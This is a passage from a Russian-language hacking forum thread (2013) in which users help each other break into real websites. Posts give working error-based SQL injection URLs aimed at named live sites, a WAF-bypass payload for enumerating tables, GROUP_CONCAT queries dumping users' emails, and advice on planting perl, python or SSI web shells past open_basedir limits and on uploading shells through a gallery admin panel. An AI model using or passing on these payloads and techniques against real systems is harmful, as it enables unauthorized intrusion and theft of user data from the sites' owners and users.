Старый 01.02.2013, 13:07   #2691
romashka_sky
 
Регистрация: 01.10.2011
Сообщений: 33
Репутация: 8
По умолчанию

Цитата:
Сообщение от zuzzz Посмотреть сообщение
Есть ли возможность обойти ограничение open_basedir и прочитать файлы?
Linux 3.3.4-gentoo
php 5.3.20
Запрещены функции: exec, dl, passthru, pcntl_exec, popen, proc_open, shell_exec, symlink, system
В mysql нет прав на чтение файлов.

Нашел только способ, как список файлов перебрать. Но это не интересно и в логах куча мусора от брута.
попробуйте воспользоваться perl-, python- или ssi-шеллом
romashka_sky вне форума   Ответить с цитированием
Старый 01.02.2013, 14:41   #2692
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

выставил чмод 755 и залил .htaccess вида
Цитата:
Options +ExecCGI
AddHandler cgi-script cgi pl
но почему-то Internal Server Error
что еще нужно питон и прел шеллу?

Последний раз редактировалось faza02; 01.02.2013 в 14:44..
faza02 вне форума   Ответить с цитированием
Старый 01.02.2013, 15:20   #2693
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

AllowOwerride All в httpd.conf

+ правильно указать в скрипте путь к питону или к перлу ($ which perl python )

+ отсутствие .htaccess в папке, куда льем, если веб-шелла еще нет

Последний раз редактировалось Pashkela; 01.02.2013 в 15:25..
Pashkela вне форума   Ответить с цитированием
Старый 03.02.2013, 16:03   #2694
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Версию вывел, таблицы не выводятся

_http://mmc-chariot.ru/index.php?Itemid=10&option=com_fireboard&func=show cat&Go=%D0%98%D0%B4%D1%82%D0%B8&catid=29'and(selec t*from(select(name_const(version(),1)),name_const( version(),1))a)and'
Flakt вне форума   Ответить с цитированием
Старый 04.02.2013, 14:16   #2695
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Версию вывел, таблицы не выводятся

_http://mmc-chariot.ru/index.php?Itemid=10&option=com_fireboard&func=show cat&Go=%D0%98%D0%B4%D1%82%D0%B8&catid=29'and(selec t*from(select(name_const(version(),1)),name_const( version(),1))a)and'
you can get the tables using extractvalue(),since the version is bigger than 5.1
the waf blocks 'information_schema.tables' and there is whitespace,but you can bypass the waf like that-
Код:
http://mmc-chariot.ru/index.php?Itemid=10&option=com_fireboard&func=show cat&Go=%D0%98%D0%B4%D1%82%D0%B8&catid=29'*extractvalue(1,concat_ws(0x27,0x27,(select(table_name)from(information_schema/*!.*/tables)where(table_schema)=schema()limit/**/0,1)))*'
spari вне форума   Ответить с цитированием
Старый 04.02.2013, 16:26   #2696
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

имеется Coppermine Photo Gallery 1.5.12 и админский доступ, вопрос: как залиться? вариант с загрузкой через плагины не катит почему-то, старые способы тоже. Есть идеи?
aka_zver вне форума   Ответить с цитированием
Старый 06.02.2013, 19:25   #2697
DeepShadow
 
Регистрация: 24.11.2012
Сообщений: 5
Репутация: 0
По умолчанию

Помогите понять...

hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)or(3)='1 - Error:
Syntax error converting the nvarchar value 'Del_Art' to a column of data type int.


hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN 'Del_Art')or(3)='1
Error:
Incorrect syntax near the keyword 'NOT'.
DeepShadow вне форума   Ответить с цитированием
Старый 06.02.2013, 19:57   #2698
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Цитата:
Сообщение от Dr.Z3r0 Посмотреть сообщение
Продолжаем апдейтить статью =) Недавно потребовалось дампить таблицу с 1 милионом записей через скулю. Было перелопаченно множество инфы, написан эксплойт под один из методов, и заодно я решил добавить описание всех известных методов в статью.
вот столкнулся с очень интересной траблой в group_dumper.txt, один и тот же запрос, на одном и том же сайте в случае обращения к данным в таблицах site1.users и site2.users , в первом случае выводит все данные между начальным и конечным значением, во втором - только часть данных с начальным значением. не видя конечного значения, скрипт не дампит. вопрос почему не выводятся все данные включая конечное значение?

Код:
 +UNION+SELECT+1%2CCONCAT%280x68646A7338636466323364%2CGROUP_CONCAT%28CONCAT_WS%280x3a%2Csex%2Cemail%29+ORDER+BY+CONCAT_WS%280x3a%2Csex%2Cemail%29+SEPARATOR+0x7c%29%2C0x6A75396F776B65646E7373%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10+FROM+site1.users+WHERE+1--+
durito вне форума   Ответить с цитированием
Старый 07.02.2013, 15:00   #2699
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от DeepShadow Посмотреть сообщение
Помогите понять...

hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)or(3)='1 - Error:
Syntax error converting the nvarchar value 'Del_Art' to a column of data type int.


hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN 'Del_Art')or(3)='1
Error:
Incorrect syntax near the keyword 'NOT'.
you can set a condition,and make the webserver ignore the table.
Код:
information_schema.tables where table_name!="Del_Art"
and then the other table,
Код:
information_schema.tables where table_name!="Del_Art" and table_name!="table2"
spari вне форума   Ответить с цитированием
Старый 13.02.2013, 16:20   #2700
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Итак имеем error based:
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1/*
Duplicate entry '4.1.14-standard1' for key 1

Знаем таблицу и поля:
Код:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select concat_ws(0x3a,id,uname,0x3a) from members+limit+1,1),floor(rand(0)*2)) having min(0) or 1/*
но получаем стандартный вывод поисковика, без сообщения об ошибке

если убрать limit то соответственно: Subquery returns more than 1 row

куды копать?
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot